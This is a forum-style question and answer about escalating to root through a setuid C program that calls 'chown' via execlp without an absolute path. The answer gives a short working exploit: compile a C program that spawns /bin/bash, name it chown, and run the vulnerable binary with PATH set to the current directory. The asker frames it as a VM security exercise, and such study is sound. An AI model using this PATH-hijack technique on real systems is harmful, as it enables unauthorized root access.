Can I get root access to a system that is using a setuid root binary?
Assuming that I have no ability to use sudo and rather limited permissions, but I have a shell script exploit that allows me to change the file ownership of a file to the current user by running a buggy program written in C that has root permissions. Specifically, the execlp() function is what is being exploited as I have already found a way to specify the file parameter. The user variable is received by a call to the getenv() function.
execlp("chown", user, file, (char *)0);
How would I exploit this ability to gain ownership of any file in the system to ultimately gain sudo access over the system? What files would I modify?
I've tried modifying the etc/sudoers file itself but it would give the following errors
sudo: no valid sudoers sources found, quitting sudo: /etc/sudoers is owned by uid 1000, should be 0 Note that I can't change the file's owner back to root as the current user does not have permission to chown the file to root. I am operating on a dummy VM right now and this is just a security exercise.
execlp does not have an absolute path for chown here, so you should be able to manipulate the linux PATH variable and get arbitrary code execution. In order to do this, write a simple C program which calls system shell like :
#include ...
void main(){
system("/bin/bash");
}Save this file and compile this program using cc program.c -o chown and set execution privilege on it using chmod +x chown Once this is done, run the vulnerable binary from the path of the evil chown binary like: PATH=. /path/to/vulnerable/c/program. Your C program will now call our custom chown binary as root and drop you into a setuid root bash shell.